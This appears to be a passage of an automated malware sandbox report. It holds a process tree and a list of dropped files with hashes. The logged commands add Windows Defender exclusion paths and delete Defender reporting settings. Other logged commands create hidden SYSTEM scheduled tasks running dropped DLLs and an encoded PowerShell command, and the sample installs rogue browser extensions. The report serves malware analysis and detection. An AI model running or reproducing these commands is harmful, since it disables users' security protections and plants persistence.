                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cbVeFIwlhYiFKdVB /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4648
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cbVeFIwlhYiFKdVB /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:1856
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4336
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:3788
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:3456
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:400
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:1632
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2824
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yqVNydvJdnVKJAcs /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:3448
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yqVNydvJdnVKJAcs /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3264
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "grhGrGLhd" /SC once /ST 05:34:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                          2⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:3024
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "grhGrGLhd"
                                                                                                                          2⤵
                                                                                                                            PID:980
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "grhGrGLhd"
                                                                                                                            2⤵
                                                                                                                              PID:2548
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /CREATE /TN "BXhqIicBgbzmzxfzH" /SC once /ST 02:44:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe\" JF /ZOsite_idatp 385118 /S" /V1 /F
                                                                                                                              2⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:3816
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /run /I /tn "BXhqIicBgbzmzxfzH"
                                                                                                                              2⤵
                                                                                                                                PID:2192
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:32
                                                                                                                              1⤵
                                                                                                                                PID:696
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4408
                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  2⤵
                                                                                                                                    PID:4660
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4372
                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                    1⤵
                                                                                                                                      PID:2300
                                                                                                                                    • C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe
                                                                                                                                      C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe JF /ZOsite_idatp 385118 /S
                                                                                                                                      1⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops Chrome extension
                                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:1276
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "buPbzvACkYlCJXJqLy"
                                                                                                                                        2⤵
                                                                                                                                          PID:3100
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                          2⤵
                                                                                                                                            PID:4312
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1864
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                              2⤵
                                                                                                                                                PID:208
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4364
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vfgYgydlU\yUUrdk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "lDXqkgYwthEwqaA" /V1 /F
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:3920
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "lDXqkgYwthEwqaA2" /F /xml "C:\Program Files (x86)\vfgYgydlU\GcpcWaX.xml" /RU "SYSTEM"
                                                                                                                                                  2⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:2436
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /END /TN "lDXqkgYwthEwqaA"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4380
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "lDXqkgYwthEwqaA"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2160
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "cVsBnLewMFsmWV" /F /xml "C:\Program Files (x86)\ltepJsludpEU2\kbussaB.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:2376
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "HdbXIkiJRYXma2" /F /xml "C:\ProgramData\cbVeFIwlhYiFKdVB\dPfSVKc.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:4244
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "SksuiGojhgncgskmM2" /F /xml "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\ImCwJoi.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:3832
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "VGEdDPNaoMJJcshJLKu2" /F /xml "C:\Program Files (x86)\EdkISHpRcryaC\yKrOdwz.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:2040
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "LziCoayHjbgPwuIox" /SC once /ST 09:08:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll\",#1 /oEsite_idgUE 385118" /V1 /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:312
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "LziCoayHjbgPwuIox"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:468
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4600
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3180
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4224
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4116
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /DELETE /F /TN "BXhqIicBgbzmzxfzH"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4136
                                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll",#1 /oEsite_idgUE 385118
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3656
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll",#1 /oEsite_idgUE 385118
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:1156
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "LziCoayHjbgPwuIox"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4316

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\Program Files (x86)\EdkISHpRcryaC\yKrOdwz.xml

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4dfe74a92de4fe6597fcb9de4d0f1ce0

                                                                                                                                                                    SHA1

                                                                                                                                                                    7b845dd98f5e87d86f2b5eb51d1b408910a4b971

                                                                                                                                                                    SHA256

                                                                                                                                                                    e02ccd14ddf3d99790dd5f01ee79f04710159b8fcc0161ce54893f7097de39e8

                                                                                                                                                                    SHA512

                                                                                                                                                                    d84f6046a87cc47cbe36a0031395ea7e94a219270414b91bd9552deb8c58941983551a2354fb4ecb65bbbe4307e87a113335ad7a1d78b81dd3b896abcb8fffd5

                                                                                                                                                                  • C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\ImCwJoi.xml

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    61e6a0757d9923b0134e943c181daec5

                                                                                                                                                                    SHA1

                                                                                                                                                                    5ef5c7ac085b89cdcc1e70a6739c864e180418a0

                                                                                                                                                                    SHA256

                                                                                                                                                                    c685eb0a3320bca922222b4aaa4c5f9580a05b7fe074ba4ac67eb220c584bfa6

                                                                                                                                                                    SHA512

                                                                                                                                                                    7c41209476a128f6b5151626c87a91390cab8868fde34e1c10dfb002b01743b1d58368c148add13cc978370ceedd964dd5d9ff99af9e5c51f397f4414c336b8f

                                                                                                                                                                  • C:\Program Files (x86)\ltepJsludpEU2\kbussaB.xml

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2d19d61f9ffec0531b6aae01c51e612a

                                                                                                                                                                    SHA1

                                                                                                                                                                    80357a14626c9bd27ab5219628a733dd5ad00b59

                                                                                                                                                                    SHA256

                                                                                                                                                                    8ce9cda05bd6f05049d82ef153dbf134f2e83d3105015584d0aa049e9e9706d6

                                                                                                                                                                    SHA512

                                                                                                                                                                    02fa1baebf89b978c93d87ef98897d33f06fc1f509421e03b8f80c20f06817e715d05004a929578e2c2f897854d875c5721e3ee5bf840fbfaa9463c8d8b6fea5

                                                                                                                                                                  • C:\Program Files (x86)\vfgYgydlU\GcpcWaX.xml

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    d3618128a9b65b64d359d5b2a1152648

                                                                                                                                                                    SHA1

                                                                                                                                                                    5b20001a30ba4ad7f1d5797cfb515d1de7cf4897

                                                                                                                                                                    SHA256

                                                                                                                                                                    5dd751d43839b27ec9da22285bd08858077b15a8cb3bd8525549d6e18d4f0f0d

                                                                                                                                                                    SHA512

                                                                                                                                                                    cd38c0b076b2b01f0e8e0782e06f3466197110ce1950aac29bf21bb8efbfbcb0aca3c3d4e3f95ed258b7f421283893b7860d607281e1937daa9aa1855b70c347

                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    e5c2ac005dda62516a2a93091a1c5bf7

                                                                                                                                                                    SHA1

                                                                                                                                                                    01babce33f8b996ad1f923d03af013658bb46edb

                                                                                                                                                                    SHA256

                                                                                                                                                                    8234712558e2ae4ec47234ec8d58642cdc828a83ed07873cab096658066cc6d3

                                                                                                                                                                    SHA512

                                                                                                                                                                    8573f06fa721cecc6dbb86fd2a305de8a867f5d478c515f2ca441ac3342a54018168e8e45715f6bee8953fc84024eb049d117c0b27687d36b65a396fe6d33b15

                                                                                                                                                                  • C:\ProgramData\cbVeFIwlhYiFKdVB\dPfSVKc.xml

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    16c7b3d037d52949e2d06ece32193da3

                                                                                                                                                                    SHA1

                                                                                                                                                                    3b1ade158064ebdf37911b573e8d837bb15c827b

                                                                                                                                                                    SHA256

                                                                                                                                                                    aa7f4ca7593b4d5b8a1c86bcb0ae16ce0ad80bf5b180aa71a7a466b733e795b7

                                                                                                                                                                    SHA512

                                                                                                                                                                    2799f0e00d6fbaf11aabfe47444ae2b0b26dba1f7dfbfef4ce17f5b3808241d14553e6c1833ee6f6f14d9e215798db4f0315302f17b260e39d89f1cb83e35316

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                    Filesize

                                                                                                                                                                    187B

                                                                                                                                                                    MD5

                                                                                                                                                                    2a1e12a4811892d95962998e184399d8

                                                                                                                                                                    SHA1

                                                                                                                                                                    55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                    SHA256

                                                                                                                                                                    32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                    SHA512

                                                                                                                                                                    bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                    Filesize

                                                                                                                                                                    136B

                                                                                                                                                                    MD5

                                                                                                                                                                    238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                    SHA1

                                                                                                                                                                    0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                    SHA256

                                                                                                                                                                    801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                    SHA512

                                                                                                                                                                    2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                    Filesize

                                                                                                                                                                    150B

                                                                                                                                                                    MD5

                                                                                                                                                                    0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                    SHA256

                                                                                                                                                                    0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                    SHA512

                                                                                                                                                                    5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                    Filesize

                                                                                                                                                                    10KB

                                                                                                                                                                    MD5

                                                                                                                                                                    964963b8466370bef85b58206380ed6e

                                                                                                                                                                    SHA1

                                                                                                                                                                    b1ec50be315e51d93b0f40a2b364a2a7cf899b34

                                                                                                                                                                    SHA256

                                                                                                                                                                    f828f9b07254b7194435ee30c71d2a470d4cb3264d5b5714067664c225033510

                                                                                                                                                                    SHA512

                                                                                                                                                                    6d435d697dd02831d0004564b230a8bda72ab4b31d4fe240ae5ca8b3a2728e67fd5be66e24e861cd99f4590d74f296bb3145417b9376005d9d6f5192699643c6

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                    SHA1

                                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                    SHA256

                                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                    SHA512

                                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                    Filesize

                                                                                                                                                                    151B

                                                                                                                                                                    MD5

                                                                                                                                                                    bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                    SHA1

                                                                                                                                                                    9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                    SHA256

                                                                                                                                                                    b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                    SHA512

                                                                                                                                                                    3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                    Filesize

                                                                                                                                                                    9KB

                                                                                                                                                                    MD5

                                                                                                                                                                    3d11d1e03b5682476ef7c5f1bccb0898

                                                                                                                                                                    SHA1

                                                                                                                                                                    81f2527c12d5efb97f09c8eb1a917253b2e6e4cf

                                                                                                                                                                    SHA256

                                                                                                                                                                    628fcf052aeccf308b5d8e4c19466066ef4d4ebdd82b071c2cabedf12fe52a6b

                                                                                                                                                                    SHA512

                                                                                                                                                                    f2c7ab9f37d67448b6b43ec9fed84a58413dca7de37fecb35fc6fcf1a0bec7dca45069fc46fda6fb529cc98b8a40f234e288436dac45016b0474205d653e4ed8

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Filesize

                                                                                                                                                                    64B

                                                                                                                                                                    MD5

                                                                                                                                                                    50a8221b93fbd2628ac460dd408a9fc1

                                                                                                                                                                    SHA1

                                                                                                                                                                    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                                                                                                                                                    SHA256

                                                                                                                                                                    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                                                                                                                                                    SHA512

                                                                                                                                                                    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSBDF1.tmp\Install.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    e3000d1068ec46da9602efcb9fab977f

                                                                                                                                                                    SHA1

                                                                                                                                                                    4ac6f9ca64f8dc0e70a21a50bfa2e4f0be57edd1

                                                                                                                                                                    SHA256

                                                                                                                                                                    9055dc08e5572e0145821a8e97202ae01fd44b0f01cceb2bb37e6eb94191f05e

                                                                                                                                                                    SHA512

                                                                                                                                                                    40efb34e33b45b8fada05d850ee6933b374f70d5066e583cf6ad8e86057b031530d6ca3a82162de3d496cb66eb899534966db7c0fa299766bf80c180f750e2ac

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSBDF1.tmp\Install.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    e3000d1068ec46da9602efcb9fab977f

                                                                                                                                                                    SHA1

                                                                                                                                                                    4ac6f9ca64f8dc0e70a21a50bfa2e4f0be57edd1

                                                                                                                                                                    SHA256

                                                                                                                                                                    9055dc08e5572e0145821a8e97202ae01fd44b0f01cceb2bb37e6eb94191f05e

                                                                                                                                                                    SHA512

                                                                                                                                                                    40efb34e33b45b8fada05d850ee6933b374f70d5066e583cf6ad8e86057b031530d6ca3a82162de3d496cb66eb899534966db7c0fa299766bf80c180f750e2ac

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC12D.tmp\Install.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC12D.tmp\Install.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1b1ursi2.g52.ps1

                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

